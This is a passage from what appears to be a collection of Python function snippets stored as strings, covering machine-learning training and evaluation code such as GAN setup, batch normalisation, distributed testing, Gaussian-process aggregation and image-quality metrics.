1):\n C = nn.DataParallel(C, list(range(NUM_GPUS)))\n\n # Discriminator\n D = Discriminator(NUM_GPUS).to(device)\n D.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n D = nn.DataParallel(D, list(range(NUM_GPUS)))\n\n # loss function and optimisers as in DCGAN paper\n BCELossFunc = nn.BCELoss()\n d_optimiser = optim.Adam(D.parameters(), lr=1e-4)\n\n # loss function and optimisers\n c_solver = optim.RMSprop(C.parameters(), lr=1e-4)\n g_solver = optim.RMSprop(G.parameters(), lr=1e-4)\n\n path = \"../output/WGAN/newResults\"\n\n epochs = train(path)\n\n # last parameter is optional for saving critic\n save_model(D, G, path, epochs, C)", "def update_grhs():\n init_gradient()\n costs_per_batch = []\n for i in range(n_train_batches):\n c = update_gradient_batch(i,*args)\n costs_per_batch.append(c)\n return numpy.mean(costs_per_batch,axis=0)", "def compute_values(self, update_statistics=False):\n\n self.compute_iterations()\n self.axsec = sum([one.axsec for one in self])\n self.xsec = sum([one.xsec for one in self])\n self.xerrc = sum([one.xerrc for one in self])\n self.xerru = math.sqrt(sum([one.xerru**2 for one in self]))\n\n self.nevents = sum([one.nevents for one in self])\n self.nw = sum([one.nw for one in self])\n self.maxit = len(self.yerr_iter) # \n self.nunwgt = sum([one.nunwgt for one in self]) \n self.wgt = 0\n self.luminosity = min([0]+[one.luminosity for one in self])\n if update_statistics:\n self.run_statistics.aggregate_statistics([_.run_statistics for _ in self])", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n \n mu = np.mean(x, axis=0)\n var = np.var(x, axis=0)\n sigma = np.sqrt(var+eps)\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. #\n #######################################################################\n out = gamma * (x - mu)/sigma + beta\n #out = (x - mu)/sigma\n #out = out * gamma.T + beta.T\n #print(gamma.shape)\n #out = out * gamma + beta\n #print(out.shape)\n \n running_mean = momentum * running_mean + (1 - momentum) * mu\n running_var = momentum * running_var + (1 - momentum) * (var+eps)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n out = (x - running_mean) / np.sqrt(running_var) * gamma + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n cache = (x, mu, sigma, gamma, beta)\n return out, cache", "def grad_ptycho_multi_gpu(self, data, psi, prb, scan, hlamd, rho, piter, recover_prb, lock, ids):\n global BUSYGPUS\n lock.acquire() # will block if lock is already held\n for k in range(self.ngpus):\n if BUSYGPUS[k] == 0:\n BUSYGPUS[k] = 1\n gpu = k\n break\n lock.release()\n\n cp.cuda.Device(gpu).use()\n data_gpu = cp.array(data[ids], order='C')\n psi_gpu = cp.array(psi[ids])\n hlamd_gpu = cp.array(hlamd[ids])\n prb_gpu = cp.array(prb[ids])\n scan_gpu = cp.array(scan[:, ids])\n\n psi_gpu, prb_gpu = self.grad_ptycho(\n data_gpu, psi_gpu, prb_gpu, scan_gpu, hlamd_gpu, rho, piter, recover_prb, gpu)\n\n psi[ids] = psi_gpu.get()\n prb[ids] = prb_gpu.get()\n\n BUSYGPUS[gpu] = 0\n\n return psi[ids], prb[ids]", "def test_distributed(self):\n self.model.eval()\n test_loss, test_correct_preds = 0, defaultdict(int)\n if self.test_loader is None: # running G2E\n self.test_loader, self.test_size, self.test_sampler = self._get_smi_dl(phase=\"test\", shuffle=False)\n self.test_sampler.set_epoch(0)\n if self.rank == 0:\n test_loader = tqdm(self.test_loader, desc='testing...')\n else:\n test_loader = self.test_loader\n \n running_topk_accs = defaultdict(lambda: np.nan)\n with torch.no_grad():\n epoch_test_size = 0\n for i, batch in enumerate(test_loader):\n batch_data = batch[0]\n if not isinstance(batch_data, tuple):\n batch_data = batch_data.cuda(non_blocking=True)\n if self.model_name == 'TransformerEBM':\n batch_data = (batch_data, 'test')\n batch_mask = batch[1].cuda(non_blocking=True)\n batch_energies = self._one_batch(\n batch_data, batch_mask, backprop=False,\n )\n test_batch_size = batch_energies.shape[0]\n test_batch_size = torch.tensor([test_batch_size]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(test_batch_size, dist.ReduceOp.SUM)\n test_batch_size = test_batch_size.item()\n epoch_test_size += test_batch_size\n\n # for validation/test data, true rxn may not be present!\n batch_idx = batch[2]\n batch_true_ranks_array = self.proposals_data['test'][batch_idx, 2].astype('int')\n batch_true_ranks_valid = batch_true_ranks_array[batch_true_ranks_array < self.args.minibatch_eval]\n batch_true_ranks = torch.as_tensor(batch_true_ranks_array).unsqueeze(dim=-1)\n # slightly tricky as we have to ignore rxns with no 'positive' rxn for loss calculation\n # (bcos nothing in the numerator, loss is undefined)\n loss_numerator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n batch_true_ranks_valid\n ]\n loss_denominator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n :\n ]\n batch_loss = (loss_numerator + torch.logsumexp(-loss_denominator, dim=1)).sum().item()\n\n for k in self.k_to_test:\n # index with lowest energy is what the model deems to be the most feasible rxn\n batch_preds = torch.topk(batch_energies, k=k, dim=1, largest=False)[1] \n batch_correct_preds = torch.where(batch_preds == batch_true_ranks)[0].shape[0]\n batch_correct_preds = torch.tensor([batch_correct_preds]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(batch_correct_preds, dist.ReduceOp.SUM)\n batch_correct_preds = batch_correct_preds.item()\n test_correct_preds[k] += batch_correct_preds\n running_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n\n if k == 1 and self.rank == 0: # overhead is only 5 ms, will check ~5 times each epoch (regardless of batch_size)\n try:\n for j in range(i * self.args.batch_size_eval, (i+1) * self.args.batch_size_eval):\n if j % (self.test_size // 5) == random.randint(0, 3) or j % (self.test_size // 8) == random.randint(0, 5): # peek at a random sample of current batch to monitor training progress\n rxn_idx = random.sample(list(range(self.args.batch_size_eval)), k=1)[0]\n rxn_true_rank = batch_true_ranks_array[rxn_idx]\n rxn_pred_rank = batch_preds[rxn_idx, 0].item()\n rxn_pred_energy = batch_energies[rxn_idx, rxn_pred_rank].item()\n rxn_true_energy = batch_energies[rxn_idx, rxn_true_rank].item() if rxn_true_rank != 9999 else 'NaN'\n rxn_orig_energy = batch_energies[rxn_idx, 0].item()\n rxn_orig_energy2 = batch_energies[rxn_idx, 1].item()\n rxn_orig_energy3 = batch_energies[rxn_idx, 2].item()\n\n rxn_true_prod = self.proposals_data['test'][batch_idx[rxn_idx], 0]\n rxn_true_prec = self.proposals_data['test'][batch_idx[rxn_idx], 1]\n rxn_cand_precs = self.proposals_data['test'][batch_idx[rxn_idx], 3:]\n rxn_pred_prec = rxn_cand_precs[batch_preds[rxn_idx]]\n rxn_orig_prec = rxn_cand_precs[0]\n rxn_orig_prec2 = rxn_cand_precs[1]\n rxn_orig_prec3 = rxn_cand_precs[2]\n logging.info(f'\\ntrue product: \\t\\t\\t\\t{rxn_true_prod}')\n logging.info(f'pred precursor (rank {rxn_pred_rank}, energy = {rxn_pred_energy:+.4f}):\\t\\t\\t{rxn_pred_prec}')\n if rxn_true_energy == 'NaN':\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy}):\\t\\t\\t\\t{rxn_true_prec}')\n else:\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy:+.4f}):\\t\\t\\t{rxn_true_prec}')\n logging.info(f'orig precursor (rank 0, energy = {rxn_orig_energy:+.4f}):\\t\\t\\t{rxn_orig_prec}')\n logging.info(f'orig precursor (rank 1, energy = {rxn_orig_energy2:+.4f}):\\t\\t\\t{rxn_orig_prec2}')\n logging.info(f'orig precursor (rank 2, energy = {rxn_orig_energy3:+.4f}):\\t\\t\\t{rxn_orig_prec3}\\n')\n break\n except Exception as e:\n tb_str = traceback.format_exception(etype=type(e), value=e, tb=e.__traceback__)\n logging.info(\"\".join(tb_str))\n logging.info('\\nIndex out of range (last minibatch)')\n \n batch_loss = torch.tensor([batch_loss]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(batch_loss, dist.ReduceOp.SUM)\n batch_loss = batch_loss.item()\n test_loss += batch_loss\n if self.rank == 0:\n test_loader.set_description(f\"testing...loss={test_loss / test_batch_size:.4f}, top-1 acc={running_topk_accs[1]:.4f}, top-5 acc={running_topk_accs[5]:.4f}, top-10 acc={running_topk_accs[10]:.4f}\")\n test_loader.refresh()\n \n for k in self.k_to_test:\n self.test_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n \n dist.barrier()\n message = f\"{self.args.expt_name}\\n\"\n if self.rank == 0:\n logging.info(f'\\nTest loss: {test_loss / epoch_test_size:.4f}')\n for k in self.k_to_test:\n this_topk_message = f'Test top-{k} accuracy: {100 * self.test_topk_accs[k]:.3f}%'\n logging.info(this_topk_message)\n message += this_topk_message + '\\n'\n try:\n send_message(message)\n except Exception as e:\n pass", "def perturb_and_get_rank(embedding, w, a, r, b, test_size, batch_size=100, all_batches=True, flow_log_prob=None):\n n_batch = (test_size + batch_size - 1) // batch_size\n ranks = []\n if all_batches is False:\n n_batch = 1\n # import ipdb;ipdb.set_trace()\n for idx in range(n_batch): # n_batch TODO\n batch_start = idx * batch_size\n batch_end = min(test_size, (idx + 1) * batch_size)\n batch_a = a[batch_start: batch_end]\n batch_r = r[batch_start: batch_end]\n emb_ar = embedding[batch_a] * w[batch_r]\n emb_ar = emb_ar.transpose(0, 1).unsqueeze(2) # size: D x E x 1\n emb_c = embedding.transpose(0, 1).unsqueeze(1) # size: D x 1 x V\n # out-prod and reduce sum\n out_prod = torch.bmm(emb_ar, emb_c) # size D x E x V\n score = torch.sum(out_prod, dim=0) # size E x V\n if score is not None:\n score = score + flow_log_prob\n score = torch.sigmoid(score)\n target = b[batch_start: batch_end]\n ranks.append(sort_and_rank(score, target))\n\n _running_ranks = 1.0+torch.cat((ranks)).float()\n mrr = torch.mean(1.0 / _running_ranks)\n mr = torch.mean(_running_ranks)\n avg_count = []\n for hit in [1,5,10]:\n avg_count.append( torch.mean((_running_ranks <= hit).float()).item())\n print(\"batch {} / {}: MR : {:.6f} | MRR : {:.6f} | Hit1: {:.6f} | Hit5: {:.6f} | Hit10: {:.6f}\".format(\n idx, n_batch, mr.item(), mrr.item(), avg_count[0], avg_count[1], avg_count[2]))\n\n return torch.cat(ranks)", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, buy never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. Setting it to true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def compute(self) -> Tuple[float, float, float]:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n self.statistics = {\n k: xm.mesh_reduce(k, v, np.sum) for k, v in self.statistics.items()\n }\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[int] = all_gather(self.statistics[key])\n value: int = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def update_prior_dist(batch_size, alpha, beta):\n global prior_dist\n grid_points = torch.arange(1., 2*batch_size, 2.).float().cuda() / (2*batch_size)\n grid_points_np = grid_points.cpu().numpy()\n grid_points_icdf = stats.beta.ppf(grid_points_np, a=alpha, b=beta)\n prior_dist = torch.tensor(grid_points_icdf).float().cuda().unsqueeze(1)", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. #\n #######################################################################\n \n sample_mean = np.mean(x, axis=0)\n sample_variance = np.var(x, axis=0)\n \n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_variance\n \n num = x - sample_mean\n denom = np.sqrt(sample_variance + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n \n cache = (gamma, x_hat, num, denom, eps, sample_variance)\n\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n num = x - running_mean\n denom = np.sqrt(running_var + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def CUDA(self):\n\n if helpers.CUDA:\n self.generator.cuda()\n self.discriminator.cuda()\n self.adv_loss.cuda()", "def calculate_macs(self) -> None:\n for name, param in self.module.named_parameters():\n if name == \"weight\":\n # ignore N, C when calculate Mult-Adds in ConvNd\n if \"Conv\" in self.class_name:\n self.macs += int(param.nelement() * prod(self.output_size[2:]))\n else:\n self.macs += param.nelement()\n # RNN modules have inner weights such as weight_ih_l0\n elif \"weight\" in name:\n self.macs += param.nelement()", "def get_nml_probs(x, model, data=None, normalize=True, num_classes=2, query_point_weight=20, dist_weight_thresh=None, \n num_grad_steps=10, lr=0.01, batch_size=32, grad_penalty=None, verbose=False, \n show_plots=False, plotting_2d=False, return_params=False):\n results = []\n data = data or DEFAULT_DATA\n orig_inputs, orig_targets = data\n \n if show_plots and plotting_2d:\n plt.figure()\n plt.title(f\"Original rewards\")\n plot_rewards(model, contours=True)\n plot_dataset(data)\n \n marker_for_class = {\n 0: 'x',\n 1: '*'\n }\n \n model.cuda()\n num_batches = ceil(len(orig_inputs) / batch_size)\n\n # NOTE train on gpu, move back to cpu for eval\n \n for proposed_class in range(num_classes):\n new_model = copy.deepcopy(model)\n new_model.cuda()\n \n # Sample all of the adaptation batches in advance\n optimizer = optim.SGD(new_model.parameters(), lr=lr)\n \n for _ in range(num_grad_steps):\n idxs = np.random.permutation(range(len(orig_inputs)))[:batch_size-1]\n X, y = orig_inputs[idxs], orig_targets[idxs]\n X = torch.Tensor(np.vstack((X, x))).cuda()\n y = torch.Tensor(np.hstack((y, proposed_class))).long().cuda()\n \n logits = new_model(X)\n loss = F.cross_entropy(logits, y, reduction='none')\n \n if dist_weight_thresh:\n weights = np.exp(-np.linalg.norm(x - X.cpu().numpy(), axis=-1) * 2.3 / dist_weight_thresh)\n else:\n weights = np.ones(len(y))\n \n weights[-1] *= query_point_weight * 1. / num_batches\n weights = torch.Tensor(weights).cuda()\n loss = torch.sum(loss * weights) / torch.sum(weights)\n \n loss.backward()\n optimizer.step()\n \n new_model.cpu()\n \n with torch.no_grad():\n x_tensor = torch.Tensor(x[None])\n probs = torch.softmax(new_model(x_tensor), -1)\n results.append(probs[0][proposed_class].item())\n \n if show_plots:\n new_model.to(torch.device(\"cpu\"))\n\n if plotting_2d: \n plt.figure()\n plot_rewards(new_model, contours=True, env = False, title=f\"Finetuning on label {proposed_class}\")\n plot_dataset(data)\n plt.scatter(x[0], x[1], marker=marker_for_class[proposed_class], color='w', s=100)\n \n plt.figure()\n plt.title(f\"Losses for label {proposed_class}\")\n plt.plot(losses)\n \n plt.figure()\n plt.title(f\"x loss for label {proposed_class}\")\n plt.plot(x_losses)\n \n plt.figure()\n plt.title(f\"x probs for label {proposed_class}\")\n plt.plot(x_vals)\n \n model.cpu()\n \n if normalize:\n results = np.array(results) / sum(results)\n else:\n results = np.array(results)\n return results if not return_params else (results, new_model)", "def compute_all(self) -> None:\n self.compute_j_matrix()\n self.compute_outter_distribution()\n self.compute_max_prior()\n self.compute_max_poutter()", "def conv_bn_relu_backward(dout, cache):\n conv_cache, sbn_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dan, dgamma, dbeta = spatial_batchnorm_backward(da, sbn_cache)\n dx, dw, db = conv_backward_fast(dan, conv_cache)\n return dx, dw, db, dgamma, dbeta", "def reset_ref_batch(self, batch):\n with torch.no_grad():\n self.labels = batch[1]\n self.batch = batch[0]\n _, self.r_act_2, _ = self.inference_net(self.batch.cuda(self.gpu_id))\n\n self.mu2_c0, self.sigma2_c0 = calc_stats(self.r_act_2[self.labels.view(-1) == 0])\n self.mu2_c1, self.sigma2_c1 = calc_stats(self.r_act_2[self.labels.view(-1) == 1])", "def setup_gpu_and_random(config):\n random.seed(config.general.manualSeed)\n np.random.seed(config.general.manualSeed)\n torch.manual_seed(config.general.manualSeed)\n torch.cuda.manual_seed(config.general.manualSeed)\n\n cudnn.benchmark = True\n cudnn.deterministic = True\n config.num_gpu = torch.cuda.device_count()\n\n if config.num_gpu > 1:\n print('------ Use multi-GPU setting ------')\n print('if you stuck too long time with multi-GPU setting, try to set --workers 0')\n # check multi-GPU issue https://github.com/clovaai/deep-text-recognition-benchmark/issues/1\n config.workers = config.workers * config.num_gpu\n config.batch_size = config.batch_size * config.num_gpu\n\n \"\"\" previous version\n print('To equlize batch stats to 1-GPU setting, the batch_size is multiplied with num_gpu and multiplied batch_size is ', opt.batch_size)\n opt.batch_size = opt.batch_size * opt.num_gpu\n print('To equalize the number of epochs to 1-GPU setting, num_iter is divided with num_gpu by default.')\n If you dont care about it, just commnet out these line.)\n opt.num_iter = int(opt.num_iter / opt.num_gpu)\n \"\"\"", "def compute(self) -> Tuple[float, float, float]:\n # @TODO: ddp hotfix, could be done better\n if self._is_ddp:\n for key in self.statistics:\n value: List[float] = all_gather(self.statistics[key])\n value: float = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def prediction_aggregation(self, xt_s,mu_s,var_s, method='PoE', weighting='uniform', power=26):\n\n nt = xt_s.shape[0]\n mu = np.zeros([nt, self.C],dtype='float64')\n var = np.zeros([nt, self.C],dtype='float64')\n\n prior_var = self.experts[0].kernel(xt_s[0], xt_s[0])\n\n \n #Process each latent gp individually \n for j in range(self.C):\n \n mu_s_c = mu_s[:, :, j]\n var_s_c = var_s[:, :, j]\n \n weight_matrix = compute_weights(mu_s_c, var_s_c, power, weighting, prior_var)\n \n prec_s= 1/var_s_c\n\n if method == 'PoE':\n \n prec = tf.reduce_sum(prec_s, axis=0)\n \n\n if method == 'gPoE':\n \n weight_matrix = normalize_weights(weight_matrix)\n\n prec = tf.reduce_sum(weight_matrix * prec_s , axis=0)\n \n\n if method == 'BCM':\n \n prec = tf.reduce_sum(prec_s, axis=0) + (1 - self.M) / prior_var \n\n if method == 'rBCM':\n \n \n prec = tf.reduce_sum(weight_matrix * prec_s, axis=0) \\\n + (1 - tf.reduce_sum(weight_matrix, axis=0)) / prior_var\n \n \n \n if method != 'bar':\n \n var[:, j] = 1 / prec\n\n mu[:, j] = var[:, j] * tf.reduce_sum(weight_matrix * prec_s * mu_s_c, axis=0)\n \n else:\n \n weight_matrix = normalize_weights(weight_matrix)\n\n mu[:, j] = tf.reduce_sum(weight_matrix * mu_s_c, axis=0)\n var[:, j] = tf.reduce_sum(weight_matrix * var_s_c, axis=0)\n \n \n return self.lik_aggregation(mu, var)", "def spatial_batchnorm_forward(x, gamma, beta, bn_param):\n out, cache = None, None\n\n #############################################################################\n # TODO: Implement the forward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return out, cache", "def stats(self):\n remaining_params, total_params = 0, 0 \n for mask, _ in self.masked_parameters:\n remaining_params += mask.detach().cpu().numpy().sum()\n total_params += mask.numel()\n return remaining_params, total_params", "def update_net(optimizer):\n assert kl_train_dataset.bp_mode\n frames_gen, frame_cnt, rel_props, prop_ticks, prop_scaling = kl_train_dataset[index]\n\n optimizer.zero_grad()\n \n num_crop = 1\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crop * 3, 224, 224]\n assert len(frames) == length * frame_cnt\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda())\n base_out = net(input_var, None, None, None, None)\n assert base_out.size(0) == frame_cnt and base_out.size(1) == base_out_dim\n step_features = base_out.mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred = net.glcu(step_features)\n gate = gate.repeat(1, frame_cnt).view(frame_cnt, base_out_dim)\n assert glcu_task_pred.size(0) == 1\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0)\n if net.additive_glcu:\n base_out = base_out + gate\n else:\n base_out = base_out * gate\n\n output = net.test_fc(base_out)\n assert output.size(0) == frame_cnt and output.size(1) == output_dim\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling, bp_mode=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = net.task_head(combined_scores)\n assert task_pred.size(0) == 1\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0)\n\n loss = KL(task_pred, glcu_task_pred)\n loss.backward()\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n break\n\n optimizer.step()\n optimizer.zero_grad()\n torch.cuda.empty_cache()\n\n return float(loss.data), frame_cnt", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(gp.input_dim, anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, gp.input_dim)))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1, model='resnet50', distortions=False, forward_only=True)", "def main(args):\n gt_path = args.ground_truth\n djdd_path = args.djdd\n bjdd_path = args.bjdd\n\n mse_fn = th.nn.MSELoss()\n psnr_fn = PSNR()\n\n device = \"cpu\"\n # if th.cuda.is_available():\n # device = \"cuda\"\n\n pdf = pd.DataFrame(columns=[\"filename\",\"imgid\", \"PSNR_for_DJDD\", \"MSE_for_DJDD\", \"PSNR_for_BJDD\", \"MSE_for_BJDD\"])\n\n count = 0\n msedjdd = 0.0\n psnrdjdd = 0.0\n\n msebjdd = 0.0\n psnrbjdd = 0.0\n\n for root, _, files in os.walk(gt_path):\n for idx, name in enumerate(files):\n \n # djdd image\n output_djdd = np.array(imread(os.path.join(djdd_path, name+\"_0_output.png\"))).astype(np.float32) / (2**8-1)\n output_djdd = th.from_numpy(np.transpose(output_djdd, [2,0,1])).to(device).unsqueeze(0)\n\n #bjdd image\n output_bjdd = np.array(imread(os.path.join(bjdd_path, name.split('.')[0]+\"_sigma_0_bayer_PIPNet.png\"))).astype(np.float32) / (2**8-1)\n output_bjdd = th.from_numpy(np.transpose(output_bjdd, [2,0,1])).to(device).unsqueeze(0)\n\n # gt image\n target = np.array(imread(os.path.join(root, name))).astype(np.float32) / (2**8-1)\n target = th.from_numpy(np.transpose(target, [2, 0, 1])).to(device).unsqueeze(0)\n\n\n target_djdd = crop_like(target, output_djdd)\n target_bjdd = crop_like(target, output_bjdd)\n\n psnr_djdd = psnr_fn(output_djdd, target_djdd).item()\n mse_djdd = mse_fn(output_djdd, target_djdd).item()\n\n psnr_bjdd = psnr_fn(output_bjdd, target_bjdd).item()\n mse_bjdd = mse_fn(output_bjdd, target_bjdd).item()\n\n psnrdjdd += psnr_djdd\n msedjdd += mse_djdd\n psnrbjdd += psnr_bjdd\n msebjdd += mse_bjdd\n\n count += 1\n\n LOG.info(f\"imgid: {idx}, PSNR_BJDD: {psnr_bjdd}, MSE_BJDD: {mse_bjdd}, PSNR_DJDD: {psnr_djdd}, MSE_DJDD: {mse_djdd}\")\n pdf = pdf.append({\n \"filename\": name,\n \"imgid\": idx,\n \"PSNR_for_DJDD\": psnr_djdd,\n \"MSE_for_DJDD\": mse_djdd,\n \"PSNR_for_BJDD\": psnr_bjdd,\n \"MSE_for_BJDD\": mse_bjdd\n }, ignore_index=True)\n # pdb.set_trace()\n\n msebjdd /= count\n psnrbjdd /= count\n\n msedjdd /= count\n psnrdjdd /= count\n\n LOG.info(\"--------------BJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrbjdd, msebjdd)\n\n 